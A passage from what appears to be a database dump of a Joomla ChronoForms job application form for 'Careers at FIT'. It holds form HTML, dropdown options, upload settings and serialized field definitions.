Services/Restaurants\">Catering/Food Services/Restaurants</option>\n<option value=\"Community/Social Services/and Nonprofit\">Community/Social Services/and Nonprofit</option>\n<option value=\"Computer/Hardware\">Computer/Hardware</option>\n<option value=\"Computer/Software\">Computer/Software</option>\n<option value=\"Construction\">Construction</option>\n<option value=\"Construction/Civil Engineering\">Construction/Civil Engineering</option>\n<option value=\"Consulting Services\">Consulting Services</option>\n<option value=\"Contracts/Purchasing\">Contracts/Purchasing</option>\n<option value=\"Customer Service\">Customer Service</option>\n<option value=\"Distributions and Logistics\">Distributions and Logistics</option>\n<option value=\"Education, Training, and Library\">Education, Training, and Library</option>\n<option value=\"Employment Placement Agencies/Recruiting\">Employment Placement Agencies/Recruiting</option>\n<option value=\"Energy\">Energy</option>\n<option value=\"Engineering\">Engineering</option>\n<option value=\"Entertainment\">Entertainment</option>\n<option value=\"FMCG\">FMCG</option>\n<option value=\"Facilities Management\">Facilities Management</option>\n<option value=\"Fashion Design\">Fashion Design</option>\n<option value=\"Finance/Economics\">Finance/Economics</option>\n<option value=\"Financial Services\">Financial Services</option>\n<option value=\"Government Sector\">Government Sector</option>\n<option value=\"Graphic Design\">Graphic Design</option>\n<option value=\"Healthcare, Practitioner and Technician\">Healthcare, Practitioner and Technician</option>\n<option value=\"Healthcare, other\">Healthcare, other</option>\n<option value=\"Hospitality/Tourism/Travel\">Hospitality/Tourism/Travel</option>\n<option value=\"Human Resources\">Human Resources</option>\n<option value=\"Industrial\">Industrial</option>\n<option value=\"Information Technology\">Information Technology</option>\n<option value=\"Installation, Maintenance, and Repair\">Installation, Maintenance, and Repair</option>\n<option value=\"Insurance\">Insurance</option>\n<option value=\"Interior design\">Interior design</option>\n<option value=\"Internet/E-commerce\">Internet/E-commerce</option>\n<option value=\"Islamic Banking\">Islamic Banking</option>\n<option value=\"Journalism\">Journalism</option>\n<option value=\"LPG Bottling\">LPG Bottling</option>\n<option value=\"Laboratory/QC\">Laboratory/QC</option>\n<option value=\"Law Enforcement/Security Services\">Law Enforcement/Security Services</option>\n<option value=\"Legal\">Legal</option>\n<option value=\"Lubricants/Greases Blending\">Lubricants/Greases Blending</option>\n<option value=\"Management\">Management</option>\n<option value=\"Manufacturing\">Manufacturing</option>\n<option value=\"Manufacturing and Production\">Manufacturing and Production</option>\n<option value=\"Marine Services\">Marine Services</option>\n<option value=\"Marketing\">Marketing</option>\n<option value=\"Mechanical\">Mechanical</option>\n<option value=\"Medical/Hospital\">Medical/Hospital</option>\n<option value=\"Merchandising\">Merchandising</option>\n<option value=\"Military\">Military</option>\n<option value=\"Mining\">Mining</option>\n<option value=\"Modeling\">Modeling</option>\n<option value=\"Natural Gas Distribution\">Natural Gas Distribution</option>\n<option value=\"Nursing\">Nursing</option>\n<option value=\"Oil/Gas\">Oil/Gas</option>\n<option value=\"Other\">Other</option>\n<option value=\"Personal Care and Service\">Personal Care and Service</option>\n<option value=\"Petrochemicals\">Petrochemicals</option>\n<option value=\"Pharmaceutical\">Pharmaceutical</option>\n<option value=\"Photography\">Photography</option>\n<option value=\"Planning\">Planning</option>\n<option value=\"Public Relations\">Public Relations</option>\n<option value=\"Publishing\">Publishing</option>\n<option value=\"Quantity Survey\">Quantity Survey</option>\n<option value=\"Real Estate\">Real Estate</option>\n<option value=\"Retail/Wholesale\">Retail/Wholesale</option>\n<option value=\"Safety/Environment\">Safety/Environment</option>\n<option value=\"Sales\">Sales</option>\n<option value=\"Science\">Science</option>\n<option value=\"Secretarial\">Secretarial</option>\n<option value=\"Security\">Security</option>\n<option value=\"Shipping\">Shipping</option>\n<option value=\"Sports and Recreation\">Sports and Recreation</option>\n<option value=\"Support Services\">Support Services</option>\n<option value=\"Technical/Maintenance\">Technical/Maintenance</option>\n<option value=\"Telecommunications\">Telecommunications</option>\n<option value=\"Telemarketing\">Telemarketing</option>\n<option value=\"Textiles\">Textiles</option>\n<option value=\"Translation\">Translation</option>\n<option value=\"Transportation\">Transportation</option>\n<option value=\"Utilities\">Utilities</option>\n<option value=\"Vehicle Inspection\">Vehicle Inspection</option>\n<option value=\"Warehousing\">Warehousing</option>\n\r\n </select>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">if other, Please specify?</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_16\" name=\"text_16\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Years of Experience</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_17\" name=\"text_17\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_dropdown\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Level of Education *</label>\r\n <select class=\"cf_inputbox validate-selection\" id=\"select_18\" size=\"1\" title=\"\" name=\"select_18\">\r\n <option value=\"\">Level of Education *</option>\r\n <option value=\"High school or equivalent\">High school or equivalent</option>\n<option value=\"Certification / diploma\">Certification / diploma</option>\n<option value=\"Bachelor\'s degree / higher diploma\">Bachelor\'s degree / higher diploma</option>\n<option value=\"Master\'s degree\">Master\'s degree</option>\n<option value=\"Doctorate\">Doctorate</option>\n\r\n </select>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Field of Education *</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_21\" name=\"text_21\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Present Employment</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_23\" name=\"text_23\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Job Title</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_24\" name=\"text_24\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Current Salary Package</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_25\" name=\"text_25\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Expected Salary Package</label>\r\n <input class=\"cf_inputbox\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_22\" name=\"text_22\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_fileupload\">\r\n <label class=\"cf_label\" style=\"display: none;\">Attach Resume along with recent Photograph *</label>\r\n <input class=\"cf_fileinput cf_inputbox required\" title=\"\" size=\"20\" id=\"file_26\" name=\"file_26\" type=\"file\" />\r\n <a class=\"tooltiplink\" onclick=\"return false;\"><img height=\"16\" border=\"0\" width=\"16\" class=\"tooltipimg\" alt=\"\" src=\"components/com_chronocontact/css/images/tooltip.png\"/></a>\r\n <div class=\"tooltipdiv\">Attach Resume along with recent Photograph * :: Attach Resume along with recent Photograph *</div>\r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textarea\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Additional Comments</label>\r\n <textarea class=\"cf_inputbox\" rows=\"3\" id=\"text_28\" title=\"\" cols=\"30\" name=\"text_28\"></textarea>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_button\">\r\n <input value=\"Send\" name=\"button_20\" type=\"submit\" />\r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n','','','',2,'fullname,city,zipcode,telephone,cell,email,url,text_16,text_17,text_21,text_23,text_24,text_25,text_22,file_26,Address,text_28,country,select_15,select_18','text,text,text,text,text,text,text,text,text,text,text,text,text,text,file,textarea,textarea,select,select,select','<p>Thank you for your interest in <strong>FIT</strong></p>','','','','','','','formmethod=post\nLoadFiles=Yes\nsubmissions_limit=\nsubmissions_limit_error=Sorry but you can not submit the form again very soon like this!\nhandlepostedarrays=Yes\ndebug=0\ncheckToken=1\nmysql_type=1\nenmambots=No\ncaptcha_dataload=0\ncaptcha_dataload_skip=\nuseCurrent=\ndatefieldformat=d/m/Y\ndatefieldsnames=\ndatefieldextras=classes: [\'dashboard\']\ndbconnection=No\nsavedataorder=after_email\ndvfields=\ndvrecord=Record #n\nuploads=Yes\nuploadfields=file_26:doc|docx{1024-1}\nuploadpath=C:\\wamp\\www\\demo_website\\fit\\components\\com_chronocontact\\uploads\\Careers_at_FIT\\\nfilename_format=$filename = date(\'YmdHis\').\'_\'.$chronofile[\'name\'];\nupload_exceedslimit=Sorry, Your uploaded file size exceeds the allowed limit.\nupload_lesslimit=Sorry, Your uploaded file size is less than the allowed limit\nupload_notallowed=Sorry, Your uploaded file type is not allowed\nimagever=No\nimtype=0\nimgver_error_msg=You have entered an incorrect verification code at the bottom of the form.\nvalidate=No\nvalidatetype=mootools\nvalidate_onlyOnBlur=1\nvalidate_wait=\nvalidate_onlyOnSubmit=0\nvalidation_type=default\nval_required=\nval_validate_number=\nval_validate_digits=\nval_validate_alpha=\nval_validate_alphanum=\nval_validate_date=\nval_validate_email=\nval_validate_url=\nval_validate_date_au=\nval_validate_currency_dollar=\nval_validate_selection=\nval_validate_one_required=\nval_validate_confirmation=\nservervalidate=No\nautogenerated_order=3\nonsubmitcode_order=2\nplugins_order=1\nplugins=\nmplugins_order=\ntablenames=','','','','','[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_2CHRONO_CONSTANT_EOLname = fullnameCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 300CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Full Name *CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textarea\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_3CHRONO_CONSTANT_EOLname = AddressCHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLrows = 3CHRONO_CONSTANT_EOLcols = 30CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = AddressCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_6CHRONO_CONSTANT_EOLname = cityCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = City *CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_5CHRONO_CONSTANT_EOLname = zipcodeCHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Zip CodeCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_dropdown\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = select_8CHRONO_CONSTANT_EOLname = countryCHRONO_CONSTANT_EOLclass = cf_inputbox validate-selectionCHRONO_CONSTANT_EOLsize = 1CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLfirstoption = 1CHRONO_CONSTANT_EOLfirstoptiontext = Country *CHRONO_CONSTANT_EOLtheoptions = Afghanistan*,*Åland Islands*,*Albania*,*Algeria*,*American Samoa*,*Andorra*,*Angola*,*Anguilla*,*Antarctica*,*Antigua and Barbuda*,*Argentina*,*Armenia*,*Aruba*,*Australia*,*Austria*,*Azerbaijan*,*Bahamas*,*Bahrain*,*Bangladesh*,*Barbados*,*Belarus*,*Belgium*,*Belize*,*Benin*,*Bermuda*,*Bhutan*,*Bolivia*,*Bonaire*,*Bosnia and Herzegovina*,*Botswana*,*Bouvet Island*,*Brazil*,*British Indian Ocean Territory*,*Brunei*,*Bulgaria*,*Burkina Faso*,*Burundi*,*Cambodia*,*Cameroon*,*Canada*,*Cape Verde*,*Cayman Islands*,*Central African Republic*,*Chad*,*Chile*,*China*,*Christmas Island*,*Cocos (Keeling) Islands*,*Colombia*,*Comoros*,*Congo*,*Congo (DRC)*,*Cook Islands*,*Costa Rica*,*Croatia*,*Cuba*,*Curaçao*,*Cyprus*,*Czech Republic*,*Denmark*,*Djibouti*,*Dominica*,*Dominican Republic*,*Ecuador*,*Egypt*,*El Salvador*,*Equatorial Guinea*,*Eritrea*,*Estonia*,*Ethiopia*,*Falkland Islands (Islas Malvinas)*,*Faroe Islands*,*Fiji Islands*,*Finland*,*France*,*French Guiana*,*French Polynesia*,*French Southern and Antarctic Lands*,*Gabon*,*Gambia, The*,*Georgia*,*Germany*,*Ghana*,*Gibraltar*,*Greece*,*Greenland*,*Grenada*,*Guadeloupe*,*Guam*,*Guatemala*,*Guernsey*,*Guinea*,*Guinea-Bissau*,*Guyana*,*Haiti*,*Heard Island and McDonald Islands*,*Honduras*,*Hong Kong SAR*,*Hungary*,*Iceland*,*India*,*Indonesia*,*Iran*,*Iraq*,*Ireland*,*Isle of Man*,*Israel*,*Italy*,*Jamaica*,*Jan Mayen*,*Japan*,*Jersey*,*Jordan*,*Kazakhstan*,*Kenya*,*Kiribati*,*Korea*,*Kuwait*,*Kyrgyzstan*,*Laos*,*Latvia*,*Lebanon*,*Lesotho*,*Liberia*,*Libya*,*Liechtenstein*,*Lithuania*,*Luxembourg*,*Macao SAR*,*Macedonia, Former Yugoslav Republic of*,*Madagascar*,*Malawi*,*Malaysia*,*Maldives*,*Mali*,*Malta*,*Marshall Islands*,*Martinique*,*Mauritania*,*Mauritius*,*Mayotte*,*Mexico*,*Micronesia*,*Moldova*,*Monaco*,*Mongolia*,*Montenegro*,*Montserrat*,*Morocco*,*Mozambique*,*Myanmar*,*Namibia*,*Nauru*,*Nepal*,*Netherlands*,*New Caledonia*,*New Zealand*,*Nicaragua*,*Niger*,*Nigeria*,*Niue*,*Norfolk Island*,*North Korea*,*Northern Mariana Islands*,*Norway*,*Oman*,*Pakistan*,*Palau*,*Palestinian Authority*,*Panama*,*Papua New Guinea*,*Paraguay*,*Peru*,*Philippines*,*Pitcairn Islands*,*Poland*,*Portugal*,*Puerto Rico*,*Qatar*,*Republic of Côte d\'Ivoire*,*Reunion*,*Romania*,*Russia*,*Rwanda*,*Saba*,*Samoa*,*San Marino*,*São Tomé and Príncipe*,*Saudi Arabia*,*Senegal*,*Serbia*,*Seychelles*,*Sierra Leone*,*Singapore*,*Sint Eustatius*,*Sint Maarten*,*Slovakia*,*Slovenia*,*Solomon Islands*,*Somalia*,*South Africa*,*South Georgia and the South Sandwich Islands*,*Spain*,*Sri Lanka*,*St. Barthélemy*,*St. Helena*,*St. Kitts and Nevis*,*St. Lucia*,*St. Martin*,*St. Pierre and Miquelon*,*St. Vincent and the Grenadines*,*Sudan*,*Suriname*,*Swaziland*,*Sweden*,*Switzerland*,*Syria*,*Taiwan*,*Tajikistan*,*Tanzania*,*Thailand*,*Timor-Leste*,*Togo*,*Tokelau*,*Tonga*,*Trinidad and Tobago*,*Tunisia*,*Turkey*,*Turkmenistan*,*Turks and Caicos Islands*,*Tuvalu*,*Uganda*,*Ukraine*,*United Arab Emirates*,*United Kingdom*,*United States*,*United States Minor Outlying Islands*,*Uruguay*,*Uzbekistan*,*Vanuatu*,*Vatican City*,*Venezuela*,*Vietnam*,*Virgin Islands, British*,*Virgin Islands, U.S.*,*Wallis and Futuna*,*Yemen*,*Zambia*,*Zimbabwe*,*CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Country *CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_11CHRONO_CONSTANT_EOLname = telephoneCHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = TelephoneCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_12CHRONO_CONSTANT_EOLname = cellCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Cell *CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_13CHRONO_CONSTANT_EOLname = emailCHRONO_CONSTANT_EOLclass = cf_inputbox required validate-emailCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Email *CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_9CHRONO_CONSTANT_EOLname = urlCHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = URL (if any)CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_dropdown\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = select_15CHRONO_CONSTANT_EOLname = select_15CHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLsize = 1CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLfirstoption = 1CHRONO_CONSTANT_EOLfirstoptiontext = Applied For *CHRONO_CONSTANT_EOLtheoptions = Software Project Manager*,*Accounting/Auditing*,*Administration*,*Advertising*,*Agriculture/Forestry/Fishing*,*Airlines/Aviation*,*Architecture*,*Arts/Entertainment/and Media*,*Automotive*,*Aviation/Marine Refueling*,*Banking*,*Biotechnology*,*Business Support*,*Catering/Food Services/Restaurants*,*Community/Social Services/and Nonprofit*,*Computer/Hardware*,*Computer/Software*,*Construction*,*Construction/Civil Engineering*,*Consulting Services*,*Contracts/Purchasing*,*Customer Service*,*Distributions and Logistics*,*Education, Training, and Library*,*Employment Placement Agencies/Recruiting*,*Energy*,*Engineering*,*Entertainment*,*FMCG*,*Facilities Management*,*Fashion Design*,*Finance/Economics*,*Financial Services*,*Government Sector*,*Graphic Design*,*Healthcare, Practitioner and Technician*,*Healthcare, other*,*Hospitality/Tourism/Travel*,*Human Resources*,*Industrial*,*Information Technology*,*Installation, Maintenance, and Repair*,*Insurance*,*Interior design*,*Internet/E-commerce*,*Islamic Banking*,*Journalism*,*LPG Bottling*,*Laboratory/QC*,*Law Enforcement/Security Services*,*Legal*,*Lubricants/Greases Blending*,*Management*,*Manufacturing*,*Manufacturing and Production*,*Marine Services*,*Marketing*,*Mechanical*,*Medical/Hospital*,*Merchandising*,*Military*,*Mining*,*Modeling*,*Natural Gas Distribution*,*Nursing*,*Oil/Gas*,*Other*,*Personal Care and Service*,*Petrochemicals*,*Pharmaceutical*,*Photography*,*Planning*,*Public Relations*,*Publishing*,*Quantity Survey*,*Real Estate*,*Retail/Wholesale*,*Safety/Environment*,*Sales*,*Science*,*Secretarial*,*Security*,*Shipping*,*Sports and Recreation*,*Support Services*,*Technical/Maintenance*,*Telecommunications*,*Telemarketing*,*Textiles*,*Translation*,*Transportation*,*Utilities*,*Vehicle Inspection*,*Warehousing*,*CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Applied For *CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_16CHRONO_CONSTANT_EOLname = text_16CHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = if other, Please specify?CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_17CHRONO_CONSTANT_EOLname = text_17CHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Years of ExperienceCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_dropdown\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = select_18CHRONO_CONSTANT_EOLname = select_18CHRONO_CONSTANT_EOLclass = cf_inputbox validate-selectionCHRONO_CONSTANT_EOLsize = 1CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLfirstoption = 1CHRONO_CONSTANT_EOLfirstoptiontext = Level of Education *CHRONO_CONSTANT_EOLtheoptions = High school or equivalent*,*Certification / diploma*,*Bachelor\'s degree / higher diploma*,*Master\'s degree*,*Doctorate*,*CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Level of Education *CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_21CHRONO_CONSTANT_EOLname = text_21CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Field of Education *CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_23CHRONO_CONSTANT_EOLname = text_23CHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Present EmploymentCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_24CHRONO_CONSTANT_EOLname = text_24CHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Job TitleCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_25CHRONO_CONSTANT_EOLname = text_25CHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Current Salary PackageCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_22CHRONO_CONSTANT_EOLname = text_22CHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Expected Salary PackageCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_fileupload\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = file_26CHRONO_CONSTANT_EOLname = file_26CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLsize = 20CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 1CHRONO_CONSTANT_EOLlabelwidth = CHRONO_CONSTANT_EOLlabeltext = Attach Resume along with recent Photograph *CHRONO_CONSTANT_EOLtooltiptext = Attach Resume along with recent Photograph * :: Attach Resume along with recent Photograph *CHRONO_CONSTANT_EOLdata = file_26:doc|docx{1024-1}CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textarea\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = 